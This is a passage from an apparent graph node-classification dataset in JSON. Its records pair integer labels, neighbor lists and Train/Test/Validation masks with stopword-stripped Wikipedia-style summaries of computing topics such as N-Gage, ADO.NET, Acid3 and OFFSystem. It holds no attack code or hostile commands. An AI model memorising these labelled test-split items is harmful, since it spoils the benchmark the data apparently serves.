ranked ultimate software 7 best place work well 1 best workplace technology prior years fortune ranked ultimate software 6th best workplace millennials 23rd great workplace women 21st best company work additionally forbes ranked company 7th innovative growth company analyst firm nucleus research deemed tech company leader hcm technology past ultimate earned 2011 forrester groundswell award achieving business organizational goals innovation social technology applications 2013 brandon hall gold award best new product feature year",
    "neighbors": [
      467
    ],
    "mask": "Train"
  },
  {
    "node_id": 9262,
    "label": 2,
    "text": "N-Gage_(service):n-gage service n-gage service also referred n-gage 2.0 mobile gaming platform nokia available several nokia smartphones running s60 symbian n-gage provided numerous games 3d graphics application featuring online via n-gage arena social features takes name original 2003 n-gage gaming device succeeded n-gage platform compatible nokia n78 n79 n81 n81 8gb n82 n85 n86 n86 8mp n95 n95 8gb n96 n97 nokia 5320 xpressmusic 5630 xpressmusic 5730 xpressmusic nokia 6210 navigator 6710 navigator 6720 classic e52 e55 e75 due memory issues hinted interview february 2008 support nokia n73 n93 n93i cancelled less two years 30 october 2009 nokia announced new n-gage games would produced reasons cited failure bad development model marketing success apple app store nokia n-gage gaming smartphone 2003 perform well expected upgraded qd version n't improve either instead developing new gaming device change concept nokia explained world e3 2005 planning put n-gage platform several smartphone devices rather releasing specific device although n81 5730 xpressmusic models two dedicated gaming-buttons next screen marketed phone built gaming often nicknamed n-gage next generation public working behind closed doors took little year e3 2006 finally announcing n-gage mobile gaming service set 2007 release also started showing next-gen titles hooked creatures deep fighting game one perhaps visually impressive—even making use motion capture february 2007 nokia announced pilot service finland promote upcoming service nokia showed previews service 2007 game developers conference san francisco california 27 august 2007 nokia confirmed previously leaked n-gage logo official logo upcoming service n-gage gaming service final form finally announced nokia 29 august 2007 nokia used tagline get play promote platform supposed released december 2007 delayed nokia team making sure service ran 'smoothly public beta test n-gage application took place 4 february 2008 27 march 2008 though limited n81 period time referred first access public test client could downloaded free n-gage website final version user access features new application offer along three games try hooked creatures deep space impact kappa base later february nokia also released tetris block breaker deluxe world series poker pro challenge users try none games entirely free offer limited trial testing purposes order experience full game either purchased rented shortly released public hackers managed unpack n-gage installation file components installed separately thus removing n81-only limitation n-gage subsequently reported working nokia nseries devices n73 n95 response nokia released advisory asking users install unsupported version could cause errors issues 20 march official n-gage blog reported first access would come end 27 march though downloaded games time would still playable application updated version released—which occurred 3 april numerous delays many vague release dates n-gage platform finally also quite suddenly released public 3 april 2008 n-gage official website though five phone models compatible begin probably older models less powerful pointed interview earlier year whereas n-gage representative mentioned memory issues n73 launch titles also changed six five brain challenge first two titles n't even included original list included block breaker deluxe tetris instead sixth postponed game space impact kappa base hours launch ikona man behind official n-gage blog say delay currently ensuring block breaker deluxe space impact kappa base tetris running smoothly new application available showroom next week two four days later 7 april nokia posted official press release commenting release new mobile service point fifa 08 also became available purchase release official website also saw small change appearance price tags added games available download event calendar tab support application n-gage compatible devices much players logged website could also see reputation level n-gage level gathered n-gage points also release party held n-gage chat room shortly release several members n-gage team attending answer questions asked t-shirts randomly handed three-hour-long event everyone also promised n-gage points coming party expected launch problem-free numerous people reported trouble downloading purchasing activating games installing application logging n-gage arena n-gage software based solution first generation mmc games compatible new platform though games made comeback form sequel e.g remake/port e.g mile high pinball similarly games developed next-gen n-gage platform work original n-gage n-gage qd adding fact newer s60 software including n-gage client games n't binary-compatible older s60 devices vice versa user interface resembles microsoft ’ xbox live service top n-gage launcher five icons navigated pressing left right phone ’ thumb pad represent user games library profile friends list showroom launcher welcomes user home screen last game played shown along quick links friends progress score table featured game nokia wants highlight week inbox messaging within launcher screen shows games currently installed phone—be trial version full game purchased rented ones trial versions pink stripe says trial far right game icon overlapping looks somewhat like battery meter pay game illustrates progress game bottom list installed games quick link get games takes showroom games paid show pop-up every time play it—asking whether ’ like try free trial either purchase enter unlock code purchased given promotions rent game screen user may also rate games downloaded 1 5 stars well write small verdict next tab profile shows many n-gage points ’ scored far playing reputation level ranging 1-5 stars number friends enlisted chosen avatar/picture represent display white silhouette person orange background per default current status offline online away—the last two assigned personal message n-gage point level list games played gaming history selecting one display many points ’ gathered within chosen game—but also show well friends game users also able look achievements unlocked—or point pickups ’ called go add friend friends list well check highlighted may choose view recent conversations player send message view profile rate player messages sent regardless whether player currently online friends list sorted name availability/status n-gage points gathered showroom displays games available download well game extras expanding game extra content downloading new episodes/adventures adventure game dirk dagger games may browsed genre latest arrivals alphabetical order payment made either using credit card paying phone bill network operator apart actually purchasing game ’ also option renting games downloaded directly phone air gprs wifi user may choose download computer install phone using usb-cable nokia pc suite lot hands-on articles first access client generally reflect positive negative feedback official first access forum n81 users shared thoughts good could 've made better—regarding launcher games currently available biggest issues point players able activate purchased game still trial version play lot players also reporting connection issues head new experience nokia play jaakko kaidesoja say pocket gamer interview 21 february 2008 asked early feedback received feedback positive well received within company critical comments well received well know perfect yet features people want things want check get roadmap several n-gage 2.0 games nominated international mobile gaming awards 2007 two three n-gage 2.0 titles received award 8 may 2008 hooked creatures deep games award 2008 meffy awards cannes prior closure n-gage service nokia released updates n-gage application regular basis first update made available 2 october 2008 dubbed v1.010_131 update included following major changes version 1.20 1459 released 13 may 2009 n't much eliminate bugs 18 august 2009 version 1.40 1557 introduced new start-up icon welcoming screen way breaking installed games speed application slightly improved well updating application may done app itself—by using check updates function device downloaded get n-gage section n-gage.com order n-gage platform games run smoothly n-gage compatible mobile devices share common set specifications screen landscape portrait 320 x 240 pixels except n97 640 x 360 pixels screen graphics stretched displayed letterbox format keep aspect ratio os symbian s60 3rd edition s60 5th edition n97 interface 5 way left right center directional pad dedicated action buttons circle square mapped onto keypad 5 0 portrait mode 2 contextual buttons touch screen interactions supported n97 emulated actions buttons on-screen buttons connectivity 3g wifi required connecting n-gage platform downloading games online functions rankings multiplayer cpu arm11 speed ranges 369 mhz n81 600 mhz e52 gpu 3d graphics hardware accelerator supported games running devices hw-accelerated n95 enhanced performance audio stereo channel n-gage games packaged differently normal symbian applications extension .n-gage run via n-gage application game resources protected drm use native symbian apis instead use proprietary api n-gage sdk n-gage api fact extension rga api available open c++ plug-in select companies allowed access n-gage sdk gain access first must approved nokia sign nda 23 october 2009 49 games released officially n-gage many games cancelled shutting n-gage service see games sequels remakes ports first generation n-gage mmc games games reportedly development cancelled include 30 october 2009 nokia announced new n-gage games would produced effectively shutting n-gage platform n-gage services includes purchasing games various online features reportedly ceased operation end 2010 31 march 2011 nokia closed drm activation service leaving customers unable reactivate purchases case device format software update transition purchases made ovi store compensation given according support staff software purchases supported one year gaming websites e.g pocket gamer link n-gage failure overwhelming competition faces apple iphone ovi gaming cited poor implementation support parent company nokia",
    "neighbors": [
      10368,
      8577,
      10754,
      6276,
      9732,
      11655,
      4365,
      529,
      10770,
      10900,
      1687,
      5274,
      669,
      5406,
      10270,
      9508,
      3626,
      7722,
      10410,
      5938,
      1972,
      7220,
      5178,
      1083,
      7866,
      1216,
      7877,
      199,
      5067,
      7246,
      3152,
      4305,
      7253,
      4951,
      8413,
      737,
      4324,
      231,
      7399,
      9063,
      10599,
      10855,
      2684
    ],
    "mask": "Test"
  },
  {
    "node_id": 9263,
    "label": 2,
    "text": "ADO.NET:ado.net ado.net data access technology microsoft .net framework provides communication relational non-relational systems common set components ado.net set computer software components programmers use access data data services database part base class library included microsoft .net framework commonly used programmers access modify data stored relational database systems though also access data non-relational data sources ado.net sometimes considered evolution activex data objects ado technology changed extensively considered entirely new product ado.net conceptually divided consumers data providers consumers applications need access data providers software components implement interface thereby provide data consumer functionality exists visual studio ide create specialized subclasses dataset classes particular database schema allowing convenient access field schema strongly typed properties helps catch programming errors compile-time enhances ide intellisense feature entity framework ef open source object-relational mapping orm framework ado.net part .net framework set technologies ado.net supports development data-oriented software applications architects developers data-oriented applications typically struggled need achieve two different objectives entity framework enables developers work data form domain-specific objects properties customers customer addresses without concern underlying database tables columns data stored entity framework developers work higher level abstraction deal data create maintain data-oriented applications less code traditional applications linq sql formerly called dlinq allows linq used query microsoft sql server databases including sql server compact databases since sql server data may reside remote server sql server query engine use query engine linq instead converts linq query sql query sent sql server processing however since sql server stores data relational data linq works data encapsulated objects two representations must mapped one another reason linq sql also defines mapping framework mapping done defining classes correspond tables database containing certain subset columns table data members",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      3096,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      11316,
      1077,
      6709,
      8246,
      6219,
      4174,
      4178,
      83,
      9813,
      603,
      608,
      2145,
      10340,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      6797,
      9360,
      9362,
      10900,
      10902,
      11414,
      3224,
      4771,
      7846,
      10921,
      2221,
      4781,
      6831,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      3303,
      1770,
      11498,
      3821,
      10991,
      2804,
      4853,
      9467,
      11515,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      11552,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      6451,
      9527,
      315,
      3388,
      5952,
      1347,
      1348,
      844,
      333,
      847,
      5460,
      853,
      1366,
      2901,
      10079,
      11616,
      2401,
      2943,
      10624,
      9609,
      9612,
      7064,
      9114,
      3997,
      10654,
      8607,
      11683,
      4010,
      5546,
      10157,
      6584,
      7100,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      5104,
      3573,
      9205,
      10229,
      9726,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 9264,
    "label": 9,
    "text": "Jean_Ichbiah:jean ichbiah jean david ichbiah 25 march 1940 – 26 january 2007 french computer scientist initial chief designer 1977–1983 ada general-purpose strongly typed programming language certified validated compilers ichbiah descendant greek turkish jews thessaloniki emigrated france 1972 1974 worked designing experimental system implementation language called lis based pascal simula chairman simula user group also one founding members ifip wg 2.4 systems implementation languages joined cii honeywell bull cii-hb louveciennes france becoming member programming research division ichbiah team submitted language design labelled green competition choose united states department defense embedded programming language green selected 1978 continued chief designer language named ada 1980 ichbiah left cii-hb founded alsys corporation la celle-saint-cloud continued language definition standardize ada 83 later went ada compiler business also supplying special validated compiler systems nasa us army others later moved waltham massachusetts subsidiary alsys 1990s ichbiah designed keyboard layout fitaly specifically optimized stylus touch-based input subsequently started textware solutions company sells text entry software pdas tablet pcs well text-entry software medical transcription pcs 1979 jean ichbiah designated chevalier knight french legion honour correspondent french academy sciences received certificate distinguished service united states department defense work ada jean ichbiah died complications brain tumor january 26 2007",
    "neighbors": [
      1952,
      4998,
      10568,
      10617,
      428,
      8524,
      3350,
      4025
    ],
    "mask": "Test"
  },
  {
    "node_id": 9265,
    "label": 5,
    "text": "Maximum_segment_lifetime:maximum segment lifetime maximum segment lifetime time tcp segment exist internetwork system arbitrarily defined long maximum segment lifetime value used determine time_wait interval 2*msl command used many unix systems determine time_wait interval 60000 60 seconds common value freebsd systems description value checked command sysctl gets result linux systems value checked either commands",
    "neighbors": [
      10924
    ],
    "mask": "Test"
  },
  {
    "node_id": 9266,
    "label": 2,
    "text": "Linux-powered_device:linux-powered device linux-based devices linux devices computer appliances powered linux kernel possibly parts gnu operating system device manufacturers reasons use linux may various low cost security stability scalability customizability many original equipment manufacturers use free open source software brand products community maintained linux devices also available devices intended run linux time production community effort made possible either full partial linux support open source philosophy free open source software brings software world many people ported linux kernel run devices typical desktop laptop server computer ports performed committed individuals groups provide alternative software favorite hardware original hardware vendors cases supportive efforts linksys wrt54g least tolerate use software end users see tivo hacking others go great lengths try stop alternative implementations android linux-based operating system optimised mobile touchscreen environments—smartphones tablets e-books like developed published maintained google android open source project consultation open handset alliance android relieves smartphone manufacturers costs developing- licensing proprietary handset operating systems first unveiled 2007 android became world widely deployed smartphone platform q4 2010 september 2012 500 million android devices activated 1.3 million devices activated per day google nexus developer phones flagship brand android handsets features capabilities represent state art time launch typically every eleven months cases oems open use software fulfil requirements free software licenses gnu general public license gpl small number cases use masked either deliberately professed ignorance misunderstanding violators usually found public records may forced declare implementations advertising example embedded software engineers mandatory linux experience required careers pages yet site product documentation offers source download offer supply software source required license gpl organizations gpl-violations.org free software foundation fsf software freedom law center sflc organized pursuing violators obtaining compliance usually seek voluntary compliance first step enter legal proceedings blocked notified violations confirm asking supplier examining available product samples even going far make blind purchases product front companies",
    "neighbors": [
      1537,
      3585,
      4616,
      3082,
      10780,
      10785,
      3618,
      6178,
      6180,
      8242,
      1083,
      4161,
      10817,
      8772,
      6213,
      10820,
      11337,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      1682,
      2195,
      2711,
      6808,
      10393,
      9882,
      1694,
      2723,
      8364,
      10933,
      5822,
      1728,
      5824,
      196,
      1736,
      2762,
      6352,
      5339,
      4831,
      2784,
      1761,
      8928,
      3300,
      2278,
      233,
      4841,
      7403,
      2285,
      10482,
      8439,
      2809,
      7938,
      2308,
      4360,
      1291,
      4367,
      1813,
      792,
      295,
      823,
      6968,
      1849,
      7992,
      318,
      7492,
      3911,
      6988,
      10063,
      11095,
      10091,
      9581,
      10606,
      2420,
      8573,
      10109,
      8066,
      900,
      4493,
      11155,
      405,
      9621,
      1431,
      8602,
      5019,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      457,
      5067,
      8147,
      6618,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 9267,
    "label": 2,
    "text": "ICade:icade icade accessory apple ipad line devices functions miniaturised portable arcade cabinet including physical joystick buttons ipad inserted icade connects device using bluetooth allowing used arcade-style controller compatible games icade input devices include 8-way ball-top joystick eight digital buttons placed inside icade ipad positioned vertically groove behind inputs accommodates landscape-mode play front device coin slot lights show icade powered flashes batteries running low power sourced either two aa batteries ac adapter also possible run ipad docking cable underside icade order charge ipad play internally icade essentially bluetooth keyboard—the joystick buttons simply mapped 24 different standard keys since ipad natively supports bluetooth keyboards able receive inputs icade without requirement special software beyond games designed respond inputs icade sends system also allows bluetooth input devices icontrolpad use protocol order control applications designed icade icade originally announced thinkgeek april 1 2010 april fools day prank however widely covered electronics media potential product thinkgeek responded speculation saying real icade possibility april fools icade stated connect via standard apple dock connector noted potential blocker release due licensing fees restrictions placed dock connections apple shortly revelation icade gag product thinkgeek contacted privately ion audio proposal develop concept thinkgeek ion staff worked tandem project able secure support atari rightsholders large catalogue arcade games thus working icade produced ion audio demonstrated running 1979 arcade title asteroids consumer electronics show january 2011 projected release late spring version replaced dock connection wireless bluetooth one sidestepping potential issues completed device released thinkgeek june 27 2011 ion audio provides document covers information necessary add icade support applications document also includes guidelines acceptance apple avoiding references icade name addition ios app developer stuart carnie manomio freely released unofficial sdk application authors use speed implementation icade controls outside ios development library made available adding icade support adobe flash games icade presents standard bluetooth hid keyboard numeric passcode must entered via buttons control stick pairing mapping used code entry quite straightforward readily apparent icade thus included reference put icade pairing mode hold bottom 4 buttons top white button 6 8 0 enter buttons simultaneously 4 seconds release official icade list http //www.ionaudio.com/products/icade-games reception icade mostly positive ars technica called attractive capable piece hardware exactly want ign referred icade surprisingly functional saying certain please target market toucharcade felt absolute must-have ipad accessory serious retro gamer engadget coverage accessory described well constructed awesome addition gaming collection feelings icade controls mixed positive ign described joystick buttons responsive however noted input configuration little cramped unbearably ars technica reviewer ben kuchera felt joystick little looser would prefer buttons require heavy finger push said controls held heavy hand toucharcade praised buttons finding exactly like 'd find old defender cabinet widest criticism device small library compatible software many early reviews drawing attention fact one icade-compatible title atari greatest hits available launch speaking positively hardware crunchreview felt limited software availability made device one trick pony ign opined 'd pretty passionate lunar lander centipede missile command fan feel disappointed n't play new 99 icade following icade atari taito released respective versions atari arcade invadercade atari arcade connects standard dock connector instead bluetooth atari arcade works atari ’ greatest hits app offers 99 games 10 although criticized flimsy controls taito space invader themed invadercade functions charger ipad plugged additionally invadercade built speakers dedicated volume knob function general media center itunes internet radio functionality compatible ipad ipad 2 invadercade similarly requires taito space invaders hd app run icade jr smaller version icade apps currently somewhat fully supported yet see ion compatibility list runs 50 via thinkgeek uses either iphone ipod touch",
    "neighbors": [
      6539
    ],
    "mask": "Train"
  },
  {
    "node_id": 9268,
    "label": 9,
    "text": "Forté_Software:forté software forté proprietary application server developed forté software used developing scalable highly available enterprise applications forté created integrated solution developing managing client/server applications forté 4gl consists application server tools deploying monitoring application object oriented proprietary programming language tool transactional object oriented language given tool runs forté application server many users simply refer tool applications forté applications product 3.5 million lines c/c++ software ported approximately twelve different operating system environments spanning range ibm mainframes microsoft windows pc first release forté 4gl published august 1994 releasing initial product forté inc. proceeded build several extensions including 1999 forté software came version forte based java instead tool named synerj also referred forté java original tool-based products consisted development ide code repository runtime environment new java product interest sun microsystems bought company tool-based listed bundled together re-branded unified development server uds integration server iplanet division server modules later bundled together enterprise application integration eai sun declared product end-of-life indicating future plans continue development product sun official support forte ceased end april 2009 enterprise application development system forté supported close linkage number different relational database systems including oracle sybase microsoft sql server informix db2 linkages could via sql embedded within tool code via sql constructed fly also support distributed applications developer would create instance specific class would placed user-specified server calls methods instance would sent across network transparently developer would need know underlying details call would transmitted tool object-oriented language following features among others tool code case-insensitive statement always terminated semicolon compound statements enclosed keywords codice_2 codice_3 comments indicated // -- remainder line becomes comment /* ... */ data types simple data types corresponding object data types examples arrays indicated keywords codice_4 first element array indexed 1 variable declaration conditional statements if-statement case-statement iteration loops events event posted e.g following statement statement posts event named codice_5 event one argument named id events handled event handlers example exception handling multithreading new thread launched statement like codice_6",
    "neighbors": [
      9665,
      6850,
      9286,
      11085,
      11030
    ],
    "mask": "Test"
  },
  {
    "node_id": 9269,
    "label": 5,
    "text": "Discovery_and_Configuration_Protocol:discovery configuration protocol discovery basic configuration protocol dcp protocol definition within profinet context link layer based protocol configure station names ip addresses restricted one subnet mainly used small medium applications without installed dhcp server",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 9270,
    "label": 5,
    "text": "RadioVIS:radiovis radiovis protocol sideband signalling images text messages broadcast audio service provide richer visual experience application sub-project radiodns allows radio consumption devices look ip-based service based parameters currently tuned broadcast station january 2015 functionality radiovis integrated visual slideshow etsi ts 101 499 v3.1.1 original rvis01 document deprecated protocol enables either streaming text oriented messaging protocol stomp comet deliver text image urls client images acquired http connection technology currently implemented number broadcasters across world including global radio bauer radio uk rté republic ireland südwestrundfunk germany number australian media groups amongst others number software clients exist show protocol well hardware devices pure sensia pure digital colourstream roberts radio",
    "neighbors": [
      3983
    ],
    "mask": "Train"
  },
  {
    "node_id": 9271,
    "label": 4,
    "text": "Marc_Stevens_(cryptology):marc stevens cryptology dr. ir marc stevens cryptology researcher known work cryptographic hash collisions creation chosen-prefix hash collision tool hashclash part master degree thesis first gained international notoriety work alexander sotirov jacob appelbaum arjen lenstra david molnar dag arne osvik benne de weger creating rogue ssl certificate presented 2008 25th annual chaos communication congress warning dangers using md5 hash function issuing ssl certificates several years later 2012 according microsoft authors flame malware used similar methodology researchers warned initiating md5 collision forge windows code-signing certificate marc recently awarded google security privacy anti-abuse applied award google selected stevens award recognition work cryptanalysis particular related sha-1 hash function february 2017 first known successful sha-1 collision attack practice termed shattered recognized marc stevens first-credited subsequent paper along cwi amsterdam colleague pierre karpman researchers elie bursztein ange albertini yarik markov alex petit bianco clement baisse google marc currently employed cryptology researcher centrum wiskunde informatica",
    "neighbors": [
      928,
      6954,
      9744,
      1783,
      8029
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9272,
    "label": 9,
    "text": "Write_once,_compile_anywhere:write compile anywhere write compile anywhere woca philosophy taken compiler associated software libraries software library/software framework refers capability writing computer program compiled platforms without need modify source code opposed sun write run anywhere slogan cross-platform compatibility implemented source code level rather also compiled binary code level many languages follow woca philosophy c++ pascal see free pascal ada c condition n't use functions beyond provided standard library languages like go go even far system specific things used work system-specific elements system platform-specific files used computer program may also use cross-platform libraries provide abstraction layer hiding differences various platforms things like sockets gui ensuring portability written source code example supported qt lazarus ide via lcl corresponding widgetsets",
    "neighbors": [
      1952,
      6403,
      8262,
      5612,
      2804,
      3577,
      1435,
      2045,
      5663
    ],
    "mask": "Test"
  },
  {
    "node_id": 9273,
    "label": 6,
    "text": "OFFSystem:offsystem owner-free file system system short peer-to-peer distributed file system shared files represented randomized multi-used data blocks instead anonymizing network data blocks anonymized therefore data garbage ever exchanged stored forwarding via intermediate nodes required claims created expressed intention cut gangrene-infested bits copyright industry development started within hacktivism group big hack 2003 hackers cheater512 captainmorgan aqlo whiteraven 2004 rudimentary version finished written php distributed two demo cds following spectralmorning re-implemented functionality 2004 c++ led current mainline client august 14 2006 captainmorgan posted letter closing addressed copyright industry associations america riaa mpaa stating created purpose ending problems consumer copyright infringement 2008 network consisted around 50 nodes april 11 2008 beta test held network size 100 nodes since spectralmorning stopped work late 2008 minor bug fix releases made mainline starting 2007 alternative compatible client developed called blocksnet written ruby well-maintained saw major improvements recent time development 2011 client offload fork mainline seemingly adds features reasons fork unclear another distantly related program monolith uses similar principle created features multi-use blocks networking system kind anonymous fully decentralized p2p file sharing program network contrast anonymous file sharing networks derive anonymity forwarding data blocks via intermediate network nodes derives anonymity anonymizing data files thus system refers brightnet contrast method operation private file sharing systems known darknets traditional forwarding anonymous p2p programs order store file local storage resp block cache choose tuple size formula_1 default 3 split source file formula_2 blocks formula_3 size 128 kib pad random data fit following finally store descriptor list block blocks list larger 128 kib insert blocks formula_11 block cache generate url referencing source file output user local url database retrieve obtain descriptor block blocks contained set size formula_1 following derives anonymity following anonymizes data blocks exchanged instead network forwarding via intermediate nodes required therefore method higher degree efficiency traditional forwarding-based anonymous p2p systems forwarding method requires data block uploaded downloaded several times reaches destination happens 5 15 times. according resulting formula formula_17 equivalent overhead 900 2900 overhead without optimizations 200 formula_2 source file size formula_19 inbound tunnel length formula_20 outbound tunnel length plus 1 hop outbound endpoint inbound gateway efficiency increased implementations",
    "neighbors": [
      8640,
      6797,
      7983,
      9245,
      823,
      5085
    ],
    "mask": "Test"
  },
  {
    "node_id": 9274,
    "label": 9,
    "text": "Emios:emios emios acronym environmental memory interoperable open service mdd mde platform aims provide range services storing sharing information environmental research activities emios initiated c. faucher june 2006 based environmental memory concepts developed motive cnrs committee specifically franck guarnieri 2003 emios set eclipse plugins based emf distributed terms epl license current version 0.0.1 mainly contains geographic information standards manager gism gism first part emios implements iso 19100 series international standards iso tc211 faucher c. gourmelon f. lafaye j.y. rouan m. mise en place ’ une mémoire environnementale adaptée aux besoins ’ un observatoire du domaine cotier menir revue internationale de géomatique hermès/lavoisier vol 19/1 pp 7-26 2009 http //geo.e-revues.com/ faucher c. lafaye j.y. 2007 model-driven engineering implementing iso 19100 series international standards coastgis 07 8th international symposium gis computer mapping coastal zone management vol 2 p. 424-433 7-10 october santander spain emios web site",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 9275,
    "label": 8,
    "text": "Acid3:acid3 acid3 test web test page web standards project checks web browser compliance elements various web standards particularly document object model dom javascript test successful results acid3 test display gradually increasing fraction counter series colored rectangles number subtests passed indicate percentage displayed screen percentage represent actual percentage conformance test really keep track subtests actually started 100 assumed moreover browser also render page exactly reference page rendered browser like text acid2 test text acid3 reference rendering bitmap order allow certain differences font rendering acid3 development april 2007 released 3 march 2008 main developer ian hickson google employee also wrote acid2 test acid2 focused primarily cascading style sheets css third acid test also focuses technologies used highly interactive websites characteristic web 2.0 ecmascript dom level 2 subtests also concern scalable vector graphics svg extensible markup language xml data uris includes several elements css2 recommendation later removed css2.1 reintroduced world wide web consortium w3c css3 working drafts made candidate recommendations yet april 2017 updated specifications diverged test latest versions google chrome mozilla firefox longer pass test written hickson acknowledges aspects test controversial written test longer reflects consensus web standards purports test especially comes issues affecting mobile browsers main part acid3 written ecmascript javascript consists 100 subtests six groups called buckets including four special subtests 0 97 98 99 compliance criteria require test run browser default settings final rendering must 100/100 score must pixel-identical reference rendering browsers designed personal computers animation smooth taking 33 ms subtest reference hardware equivalent top-of-the-line apple laptop well though slower performance slow device imply non-conformance pass test browser must also display generic favicon browser toolbar favicon image acid3 web server acid3 server asked codice_1 gives 404 response code image data body tests web browser correctly handles 404 error code fetching favicon treating failure displaying generic icon instead test running rectangles added rendered image number subtests passed bucket determine color rectangles note acid3 display exactly many subtests passed bucket example 3 subtests passing 4 subtests passing bucket 2 would render black rectangle acid3 test page completely rendered word acid3 clicked see alert shift-click new window explaining exactly subtests failed error message case one 100 tests passed took much time report includes timing results single test alert reports total time whole acid3 test order render test correctly user agents need implement css 3 text shadows css 2.x downloadable fonts specifications currently consideration w3c standardized required test uses custom truetype font called acidahemtest cover 20x20 red square supporting truetype fonts however required css specification browser supporting opentype fonts cff outlines embedded opentype fonts could support css standard fail test acid3 test glyph rendered downloaded font square made white css thus invisible addition test also uses base64 encoded images advanced selectors css 3 color values hsla well bogus selectors values ignored google employee ian hickson started working test april 2007 development progressed slowly december 2007 work restarted project received public attention january 10 2008 mentioned blogs anne van kesteren time project resided url clearly showing experimental nature nowiki http //www.hixie.ch/tests/evil/acid/003/not_ready_please_do_not_use.html /nowiki despite notice url test received widespread attention web-development community time 84 subtests done january 14 ian hickson announced competition fill missing 16 following developers contributed final test competition even official release acid3 impact browser development dramatic particular webkit score rose 60 87 less month test officially released march 3 2008 guide commentary expected follow within months march 2011 commentary released announcement test complete means considered stable enough actual use problems bugs found test modified fix march 26 2008—the day opera webkit teams announced 100/100 score—developers webkit contacted hickson critical bug acid3 presumably allowed violation svg 1.1 standard pass hickson fixed bug help cameron mccormack member w3c svg working group 2008 development versions presto webkit layout engines used opera safari respectively scored 100/100 test rendered test page correctly time browser using presto webkit layout engines passed performance aspect test google chrome opera mobiledisplayed score 100/100 security concerns downloadable fonts delayed chrome passing version 68 later chrome gets score 97/100 time acid3 release mozilla firefox developers preparing imminent release firefox 3 focusing stability acid3 success consequently firefox 3 score 71 firefox 3.5 scored 93/100 firefox 3.6 scored 94/100 initially firefox 4 scored 97/100 support svg fonts later firefox 4 scored 100/100 svg font tests removed acid3 according mozilla employee robert o'callahan firefox support svg fonts mozilla considered woff superior alternative svg fonts another mozilla engineer boris zbarsky claimed subset specification implemented webkit opera gives benefits web authors users woff asserted implementing svg fonts fully web browser hard designed integration html mind april 2 2010 ian hickson made minor changes test mozilla due privacy concerns altered way gecko handles codice_2 pseudo-class firefox 51.0a1 made regression 100 99 september 14 2016 firefox 55.0a1 regressed 97 may 1 2017 firefox quantum versions 63.0 received 97/100 64.0 got 96/100 microsoft said acid3 agree goal internet explorer 8 ie8 would improve standards tested acid3 ie8 scored 20/100 much worse relevant competitors time acid3 release problems rendering acid3 test page 18 november 2009 internet explorer team posted blog entry early development internet explorer 9 pdc presentation showing internal build browser could score 32/100 throughout 2010 several public developer previews improved internet explorer 9 test scores 55/100 16 march 95/100 4 august dean hachamovich general manager ie team argued striving 100/100 acid3 test neither necessary desirable claimed two acid3 failures related features svg fonts smil animation transition internet explorer 11 edge display score 100/100 early iterations test criticized cherry-picked collection features rarely used well still w3c working draft eric a. meyer notable web standards advocate wrote real point acid3 test n't broad-spectrum standards-support test showpiece something potemkin village shame really needed right exhaustive test suites specifications—xhtml css dom svg implementing enough standard pass test disingenuous nothing standards compliance argued mozilla ux lead alex limi article mythbusting firefox 4 wo n't score 100 acid3 limi argued tests particularly svg fonts relation real usage implementations browsers created solely point raising scores september 17 2011 ian hickson announced update acid3 hickson words håkon wium lie opera software commented parts test might get changed specs hoped change would allow specs change whatever way best web rather constraining changes things happened fit acid3 tested result firefox 4 internet explorer 9 achieved score 100/100 acid3 internet explorer n't render test properly support text-shadow internet explorer 10 parts following standards tested acid3 passing score considered valid browser default settings used following browser settings user actions may invalidate test",
    "neighbors": [
      1664,
      2304,
      6528,
      3971,
      6657,
      3462,
      7943,
      8584,
      6028,
      6034,
      2579,
      7572,
      8854,
      7965,
      9757,
      8351,
      10910,
      417,
      5026,
      7713,
      1834,
      9770,
      7340,
      559,
      9908,
      4661,
      3639,
      11449,
      4797,
      5054,
      64,
      9029,
      10057,
      11082,
      5707,
      11466,
      7885,
      11469,
      4048,
      10834,
      8021,
      3286,
      4310,
      5078,
      6231,
      8281,
      2139,
      6747,
      8923,
      479,
      737,
      5605,
      4326,
      487,
      8169,
      1642,
      9834,
      8557,
      494,
      1520,
      7152,
      115,
      9843,
      6133,
      4728,
      5114,
      8443,
      124,
      637
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9276,
    "label": 2,
